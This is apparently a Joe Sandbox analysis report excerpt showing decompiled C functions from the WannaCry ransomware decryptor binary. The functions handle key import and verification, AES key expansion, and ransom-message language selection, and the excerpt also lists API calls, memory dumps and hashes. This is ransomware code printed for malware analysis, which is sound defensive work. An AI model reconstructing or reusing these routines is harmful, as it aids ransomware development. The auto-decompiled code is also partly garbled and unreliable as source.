				_t63 = __ecx;
				_v560 = __ecx;
				_t38 = "TESTDATA"; // 0x54534554
				_v552 = _t38;
				_t67 =  *0x420c64; // 0x41544144
				_v548 = _t67;
				_t92 =  *0x420c68; // 0x0
				_v544 = _t92;
				_v543 = 0;
				_v540 = 0;
				memset( &_v539, 0, 0x7f << 2);
				_t120 = _t118 - 0x21c + 0xc;
				asm("stosw");
				asm("stosb");
				asm("repne scasb");
				_v556 = 0xbadbac;
				if(E004046B0(_t63) == 0) {
					L6:
					 *[fs:0x0] = _v20;
					return 0;
				} else {
					_v8 = 0;
					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
					_t121 = _t120 + 0xc;
					if(_t45 == 0) {
						L12:
						_push(0xffffffff);
						_push( &_v20);
						goto L5;
					} else {
						_t76 = _a8;
						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
						_t121 = _t121 + 0xc;
						if(_t48 == 0) {
							goto L12;
						} else {
							asm("repne scasb");
							_t78 =  !(_t76 | 0xffffffff);
							_t116 =  &_v552 - _t78;
							_t79 = _t78 >> 2;
							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
							_t121 = _t121 + 0x18;
							_push(0x200);
							_push( &_v556);
							_push( &_v540);
							_push(0);
							_push(1);
							_push(0);
							_push( *((intOrPtr*)(_t63 + 8)));
							if( *0x4217cc() != 0) {
								_t85 =  *(_t63 + 0xc);
								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
									asm("repne scasb");
									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
										_v8 = 0xffffffff;
										E004049A6(_t63);
										goto L6;
									} else {
										_push(0xffffffff);
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L5;
								}
							} else {
								_push(0xffffffff);
								_push( &_v20);
								L5:
								L00413056();
								goto L6;
							}
						}
					}
				}
			}




























                                  0x004047c3
                                  0x004047c5
                                  0x004047ca
                                  0x004047d5
                                  0x004047d6
                                  0x004047e6
                                  0x004047e8
                                  0x004047ee
                                  0x004047f3
                                  0x004047f9
                                  0x004047ff
                                  0x00404805
                                  0x0040480b
                                  0x00404811
                                  0x00404818
                                  0x0040482c
                                  0x0040482c
                                  0x0040482e
                                  0x00404830
                                  0x0040483c
                                  0x00404841
                                  0x00404850
                                  0x004048f3
                                  0x004048f8
                                  0x00404905
                                  0x00404856
                                  0x00404856
                                  0x00404869
                                  0x0040486e
                                  0x00404873
                                  0x00404995
                                  0x00404995
                                  0x0040499a
                                  0x00000000
                                  0x00404879
                                  0x0040487c
                                  0x00404885
                                  0x0040488a
                                  0x0040488f
                                  0x00000000
                                  0x00404895
                                  0x004048a6
                                  0x004048a8
                                  0x004048ae
                                  0x004048b2
                                  0x004048bc
                                  0x004048bc
                                  0x004048be
                                  0x004048c9
                                  0x004048d0
                                  0x004048d1
                                  0x004048d3
                                  0x004048d5
                                  0x004048da
                                  0x004048e3
                                  0x0040491c
                                  0x00404928
                                  0x0040493d
                                  0x0040495c
                                  0x00404984
                                  0x0040498b
                                  0x00000000
                                  0x0040495e
                                  0x0040495e
                                  0x00404963
                                  0x00404964
                                  0x00404974
                                  0x00404981
                                  0x00404981
                                  0x0040492a
                                  0x0040492a
                                  0x0040492f
                                  0x00000000
                                  0x0040492f
                                  0x004048e5
                                  0x004048e5
                                  0x004048ea
                                  0x004048eb
                                  0x004048eb
                                  0x00000000
                                  0x004048f0
                                  0x004048e3
                                  0x0040488f
                                  0x00404873

                                  APIs
                                    • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                    • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                    • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                    • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                  • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                  • _local_unwind2.MSVCRT ref: 004048EB
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
                                  • strncmp.MSVCRT(00000000,?), ref: 00404951
                                  • _local_unwind2.MSVCRT ref: 00404964
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                  • String ID: TESTDATA
                                  • API String ID: 154225373-1607903762
                                  • Opcode ID: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                  • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                  • Opcode Fuzzy Hash: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                  • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004049B0 Relevance: 10.6, APIs: 7, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
				int _v8;
				char _v20;
				long _v32;
				int _v36;
				long _v40;
				void* _v44;
				long _t24;
				int _t28;
				BYTE* _t35;
				void* _t46;
				long _t51;
				intOrPtr _t53;

				_push(0xffffffff);
				_push(0x415e48);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_v44 = 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t46;
				if(_t46 == 0xffffffff) {
					L10:
					_push(0xffffffff);
					goto L11;
				} else {
					_t24 = GetFileSize(_t46, 0);
					_t51 = _t24;
					_v40 = _t51;
					if(_t51 != 0xffffffff) {
						if(_t51 <= 0x19000) {
							_t35 = GlobalAlloc(0, _t51);
							_v36 = _t35;
							if(_t35 == 0) {
								goto L10;
							} else {
								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
									_push(0xffffffff);
									if(_t28 == 0) {
										L11:
										_push( &_v20);
										goto L12;
									} else {
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L12;
								}
							}
						} else {
							_push(0xffffffff);
							_push( &_v20);
							goto L12;
						}
					} else {
						_push(_t24);
						_push( &_v20);
						L12:
						L00413056();
						 *[fs:0x0] = _v20;
						return 0;
					}
				}
			}















                                  0x004049b3
                                  0x004049b5
                                  0x004049ba
                                  0x004049c5
                                  0x004049c6
                                  0x004049d3
                                  0x004049dc
                                  0x004049df
                                  0x004049e2
                                  0x004049fb
                                  0x004049fd
                                  0x00404a03
                                  0x00404ac1
                                  0x00404ac1
                                  0x00000000
                                  0x00404a09
                                  0x00404a0b
                                  0x00404a11
                                  0x00404a13
                                  0x00404a19
                                  0x00404a2b
                                  0x00404a40
                                  0x00404a42
                                  0x00404a47
                                  0x00000000
                                  0x00404a49
                                  0x00404a5a
                                  0x00404a75
                                  0x00404a7d
                                  0x00404a7f
                                  0x00404ac3
                                  0x00404ac6
                                  0x00000000
                                  0x00404a81
                                  0x00404a84
                                  0x00404a85
                                  0x00404a95
                                  0x00404aa2
                                  0x00404aa2
                                  0x00404a5c
                                  0x00404a5c
                                  0x00404a61
                                  0x00000000
                                  0x00404a61
                                  0x00404a5a
                                  0x00404a2d
                                  0x00404a2d
                                  0x00404a32
                                  0x00000000
                                  0x00404a32
                                  0x00404a1b
                                  0x00404a1b
                                  0x00404a1f
                                  0x00404ac7
                                  0x00404ac7
                                  0x00404ad4
                                  0x00404ae1
                                  0x00404ae1
                                  0x00404a19

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                  • _local_unwind2.MSVCRT ref: 00404AC7
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateSize_local_unwind2
                                  • String ID:
                                  • API String ID: 1039228802-0
                                  • Opcode ID: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                  • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                  • Opcode Fuzzy Hash: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                  • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406C20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00406C20(void* __ecx) {
				void _v51;
				void* _v52;
				signed int _t14;
				void* _t26;
				char* _t30;
				unsigned int _t36;
				signed int _t37;
				void* _t55;

				_t26 = __ecx;
				_v52 = 0;
				memset( &_v51, 0, 0xc << 2);
				asm("stosb");
				_t14 = GetUserDefaultLangID();
				_t30 =  &_v52;
				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
					asm("repne scasb");
					_t36 =  !(_t30 | 0xffffffff);
					_t55 = "English" - _t36;
					_t37 = _t36 >> 2;
					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
				}
				if(SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52) != 0xffffffff) {
					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52);
					return E00406AE0(_t26);
				} else {
					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
					return E00406AE0(_t26);
				}
			}











                                  0x00406c25
                                  0x00406c33
                                  0x00406c38
                                  0x00406c3a
                                  0x00406c3b
                                  0x00406c41
                                  0x00406c5b
                                  0x00406c65
                                  0x00406c67
                                  0x00406c71
                                  0x00406c75
                                  0x00406c7f
                                  0x00406c7f
                                  0x00406c9f
                                  0x00406cd4
                                  0x00406ce3
                                  0x00406ca1
                                  0x00406cb1
                                  0x00406cc0
                                  0x00406cc0

                                  APIs
                                  • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                  • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                  • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                  • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                    • Part of subcall function 00406AE0: #540.MFC42(?,765920C0), ref: 00406B03
                                    • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,765920C0), ref: 00406B62
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                    • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,765920C0), ref: 00406BC4
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                    • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                  • String ID: English
                                  • API String ID: 600832625-3812506524
                                  • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                  • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A150 Relevance: 9.4, APIs: 6, Instructions: 375COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E0040A150(void* __ecx) {
				void* _t170;
				void* _t177;
				unsigned int _t178;
				intOrPtr _t182;
				signed int _t189;
				signed int _t190;
				signed int _t192;
				signed int* _t198;
				signed int* _t203;
				signed int _t214;
				signed int* _t215;
				signed int _t224;
				void* _t236;
				unsigned int _t238;
				signed int _t239;
				signed int _t245;
				signed int _t251;
				void* _t268;
				void* _t275;
				signed int _t276;
				void* _t278;
				signed int _t290;
				int _t292;
				signed int _t293;
				signed int _t317;
				signed int _t321;
				signed int _t337;
				signed int _t353;
				signed int _t355;
				intOrPtr* _t375;
				signed int _t378;
				void* _t385;
				void* _t386;
				void* _t387;
				signed int _t388;
				signed int* _t390;
				void* _t391;
				void* _t392;
				signed int _t395;
				signed int* _t397;
				intOrPtr _t398;
				void* _t399;
				void* _t403;

				_t236 = __ecx;
				if( *((intOrPtr*)(_t399 + 4)) == 0) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				_t170 =  *(_t399 + 0x20);
				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_t170 = _t399 + 8;
					_push(0x41c9c0);
					_push(_t170);
					L004130FC();
				}
				_t238 =  *(_t399 + 0x24);
				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
					_t238 = _t399 + 0xc;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				 *(_t236 + 0x3c8) = _t170;
				 *(_t236 + 0x3cc) = _t238;
				_t290 = _t238;
				_t385 =  *(_t399 + 0x20);
				_t19 = _t236 + 0x3d0; // 0x424
				_t239 = _t238 >> 2;
				memcpy(_t19, _t385, _t239 << 2);
				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
				_t22 = _t236 + 0x3f0; // 0x444
				_t245 =  *(_t236 + 0x3cc) >> 2;
				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
				_t403 = _t399 + 0x30;
				_t177 =  *(_t236 + 0x3c8);
				if(_t177 == 0x10) {
					_t178 =  *(_t236 + 0x3cc);
					if(_t178 != 0x10) {
						asm("sbb eax, eax");
						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
					} else {
						_t182 = 0xa;
					}
					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
				} else {
					if(_t177 == 0x18) {
						asm("sbb ecx, ecx");
						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
					} else {
						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
					}
				}
				asm("cdq");
				_t292 = 0;
				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
				 *(_t403 + 0x2c) = _t251;
				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
					L23:
					_t293 = 0;
					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
						L28:
						_t44 = _t236 + 0x414; // 0x468
						_t387 = _t44;
						asm("cdq");
						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
						 *(_t403 + 0x30) = _t353;
						_t189 =  *(_t403 + 0x24);
						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
						 *(_t403 + 0x10) = _t395;
						if(_t395 <= 0) {
							L31:
							_t388 = 0;
							if(_t395 <= 0) {
								L35:
								if(_t388 >= _t353) {
									L51:
									_t190 = 1;
									 *(_t403 + 0x30) = 1;
									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
										L58:
										 *((char*)(_t236 + 4)) = 1;
										return _t190;
									}
									_t151 = _t236 + 0x208; // 0x25c
									_t397 = _t151;
									do {
										if(_t251 <= 0) {
											goto L57;
										}
										_t390 = _t397;
										_t355 = _t251;
										do {
											_t192 =  *_t390;
											 *(_t403 + 0x24) = _t192;
											_t390 =  &(_t390[1]);
											_t355 = _t355 - 1;
											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
										} while (_t355 != 0);
										_t251 =  *(_t403 + 0x2c);
										L57:
										_t190 =  *(_t403 + 0x30) + 1;
										_t397 =  &(_t397[8]);
										 *(_t403 + 0x30) = _t190;
									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
									goto L58;
								}
								 *(_t403 + 0x28) = 0x41a1b0;
								do {
									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
									if(_t395 == 8) {
										_t104 = _t236 + 0x418; // 0x46c
										_t198 = _t104;
										_t268 = 3;
										do {
											 *_t198 =  *_t198 ^  *(_t198 - 4);
											_t198 =  &(_t198[1]);
											_t268 = _t268 - 1;
										} while (_t268 != 0);
										 *(_t403 + 0x24) =  *(_t236 + 0x420);
										_t275 = 3;
										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
										_t116 = _t236 + 0x428; // 0x47c
										_t203 = _t116;
										do {
											 *_t203 =  *_t203 ^  *(_t203 - 4);
											_t203 =  &(_t203[1]);
											_t275 = _t275 - 1;
										} while (_t275 != 0);
										L46:
										 *(_t403 + 0x24) = 0;
										if(_t395 <= 0) {
											goto L50;
										}
										_t119 = _t236 + 0x414; // 0x468
										_t375 = _t119;
										while(1) {
											_t251 =  *(_t403 + 0x2c);
											if(_t388 >=  *(_t403 + 0x30)) {
												goto L51;
											}
											_t398 =  *_t375;
											asm("cdq");
											_t375 = _t375 + 4;
											_t276 = _t388 / _t251;
											asm("cdq");
											_t317 = _t388 %  *(_t403 + 0x2c);
											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
											_t395 =  *(_t403 + 0x10);
											_t214 =  *(_t403 + 0x24) + 1;
											_t388 = _t388 + 1;
											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
											 *(_t403 + 0x24) = _t214;
											if(_t214 < _t395) {
												continue;
											}
											goto L50;
										}
										goto L51;
									}
									if(_t395 <= 1) {
										goto L46;
									}
									_t101 = _t236 + 0x418; // 0x46c
									_t215 = _t101;
									_t278 = _t395 - 1;
									do {
										 *_t215 =  *_t215 ^  *(_t215 - 4);
										_t215 =  &(_t215[1]);
										_t278 = _t278 - 1;
									} while (_t278 != 0);
									goto L46;
									L50:
									_t251 =  *(_t403 + 0x2c);
								} while (_t388 <  *(_t403 + 0x30));
								goto L51;
							}
							_t58 = _t236 + 0x414; // 0x468
							 *(_t403 + 0x24) = _t58;
							while(_t388 < _t353) {
								asm("cdq");
								_t378 = _t388 / _t251;
								asm("cdq");
								_t321 = _t388 % _t251;
								 *(_t403 + 0x28) = _t321;
								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
								_t388 = _t388 + 1;
								_t224 =  *(_t403 + 0x24);
								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
								_t353 =  *(_t403 + 0x30);
								 *(_t403 + 0x24) = _t224 + 4;
								if(_t388 < _t395) {
									continue;
								}
								goto L35;
							}
							goto L51;
						}
						 *(_t403 + 0x24) = _t395;
						do {
							_t387 = _t387 + 4;
							 *(_t387 - 4) = 0 << 0x18;
							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
							_t189 = _t189 + 4;
							_t337 =  *(_t403 + 0x24) - 1;
							 *(_t403 + 0x24) = _t337;
						} while (_t337 != 0);
						goto L31;
					}
					_t38 = _t236 + 0x1e8; // 0x23c
					_t391 = _t38;
					do {
						if(_t251 > 0) {
							memset(_t391, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t293 = _t293 + 1;
						_t391 = _t391 + 0x20;
					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L28;
				} else {
					_t33 = _t236 + 8; // 0x5c
					_t392 = _t33;
					do {
						if(_t251 > 0) {
							memset(_t392, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t292 = _t292 + 1;
						_t392 = _t392 + 0x20;
					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L23;
				}
			}














































                                  0x0040a15a
                                  0x0040a15c
                                  0x0040a167
                                  0x0040a16f
                                  0x0040a179
                                  0x0040a17e
                                  0x0040a17f
                                  0x0040a17f
                                  0x0040a184
                                  0x0040a18b
                                  0x0040a1a0
                                  0x0040a1a8
                                  0x0040a1ae
                                  0x0040a1b2
                                  0x0040a1b7
                                  0x0040a1b8
                                  0x0040a1b8
                                  0x0040a1bd
                                  0x0040a1c4
                                  0x0040a1d4
                                  0x0040a1dd
                                  0x0040a1e1
                                  0x0040a1eb
                                  0x0040a1f0
                                  0x0040a1f1
                                  0x0040a1f1
                                  0x0040a1f7
                                  0x0040a201
                                  0x0040a208
                                  0x0040a20b
                                  0x0040a20d
                                  0x0040a213
                                  0x0040a216
                                  0x0040a225
                                  0x0040a229
                                  0x0040a22f
                                  0x0040a239
                                  0x0040a239
                                  0x0040a23b
                                  0x0040a244
                                  0x0040a272
                                  0x0040a27b
                                  0x0040a289
                                  0x0040a28e
                                  0x0040a27d
                                  0x0040a27d
                                  0x0040a27d
                                  0x0040a291
                                  0x0040a246
                                  0x0040a249
                                  0x0040a262
                                  0x0040a26a
                                  0x0040a24b
                                  0x0040a24b
                                  0x0040a24b
                                  0x0040a249
                                  0x0040a29d
                                  0x0040a2a3
                                  0x0040a2ad
                                  0x0040a2b2
                                  0x0040a2b6
                                  0x0040a2d7
                                  0x0040a2dd
                                  0x0040a2e1
                                  0x0040a305
                                  0x0040a312
                                  0x0040a312
                                  0x0040a318
                                  0x0040a319
                                  0x0040a31f
                                  0x0040a327
                                  0x0040a32b
                                  0x0040a330
                                  0x0040a334
                                  0x0040a36e
                                  0x0040a36e
                                  0x0040a372
                                  0x0040a3cf
                                  0x0040a3d1
                                  0x0040a576
                                  0x0040a57c
                                  0x0040a583
                                  0x0040a587
                                  0x0040a5f3
                                  0x0040a5f5
                                  0x0040a5fe
                                  0x0040a5fe
                                  0x0040a589
                                  0x0040a589
                                  0x0040a58f
                                  0x0040a591
                                  0x00000000
                                  0x00000000
                                  0x0040a593
                                  0x0040a595
                                  0x0040a597
                                  0x0040a597
                                  0x0040a59b
                                  0x0040a5a5
                                  0x0040a5d3
                                  0x0040a5d4
                                  0x0040a5d4
                                  0x0040a5d9
                                  0x0040a5dd
                                  0x0040a5e7
                                  0x0040a5e8
                                  0x0040a5ed
                                  0x0040a5ed
                                  0x00000000
                                  0x0040a58f
                                  0x0040a3d7
                                  0x0040a3df
                                  0x0040a3e8
                                  0x0040a446
                                  0x0040a44c
                                  0x0040a450
                                  0x0040a478
                                  0x0040a478
                                  0x0040a47e
                                  0x0040a483
                                  0x0040a48a
                                  0x0040a48c
                                  0x0040a48f
                                  0x0040a48f
                                  0x0040a49a
                                  0x0040a4e0
                                  0x0040a4ec
                                  0x0040a4f2
                                  0x0040a4f2
                                  0x0040a4f8
                                  0x0040a4ff
                                  0x0040a501
                                  0x0040a504
                                  0x0040a504
                                  0x0040a507
                                  0x0040a509
                                  0x0040a511
                                  0x00000000
                                  0x00000000
                                  0x0040a513
                                  0x0040a513
                                  0x0040a519
                                  0x0040a51d
                                  0x0040a523
                                  0x00000000
                                  0x00000000
                                  0x0040a527
                                  0x0040a529
                                  0x0040a52c
                                  0x0040a52f
                                  0x0040a533
                                  0x0040a534
                                  0x0040a53b
                                  0x0040a545
                                  0x0040a555
                                  0x0040a556
                                  0x0040a559
                                  0x0040a560
                                  0x0040a564
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a564
                                  0x00000000
                                  0x0040a519
                                  0x0040a455
                                  0x00000000
                                  0x00000000
                                  0x0040a45b
                                  0x0040a45b
                                  0x0040a461
                                  0x0040a464
                                  0x0040a46b
                                  0x0040a46d
                                  0x0040a470
                                  0x0040a470
                                  0x00000000
                                  0x0040a566
                                  0x0040a56a
                                  0x0040a56e
                                  0x00000000
                                  0x0040a3df
                                  0x0040a374
                                  0x0040a37a
                                  0x0040a37e
                                  0x0040a388
                                  0x0040a38b
                                  0x0040a38f
                                  0x0040a390
                                  0x0040a392
                                  0x0040a39f
                                  0x0040a3af
                                  0x0040a3b3
                                  0x0040a3bc
                                  0x0040a3c3
                                  0x0040a3c9
                                  0x0040a3cd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040a3cd
                                  0x00000000
                                  0x0040a37e
                                  0x0040a336
                                  0x0040a33a
                                  0x0040a33c
                                  0x0040a344
                                  0x0040a34f
                                  0x0040a366
                                  0x0040a367
                                  0x0040a368
                                  0x0040a368
                                  0x00000000
                                  0x0040a33a
                                  0x0040a2e3
                                  0x0040a2e3
                                  0x0040a2e9
                                  0x0040a2eb
                                  0x0040a2f1
                                  0x0040a2f1
                                  0x0040a2f3
                                  0x0040a2f3
                                  0x0040a2fd
                                  0x0040a2fe
                                  0x0040a301
                                  0x00000000
                                  0x0040a2b8
                                  0x0040a2b8
                                  0x0040a2b8
                                  0x0040a2bb
                                  0x0040a2bd
                                  0x0040a2c3
                                  0x0040a2c3
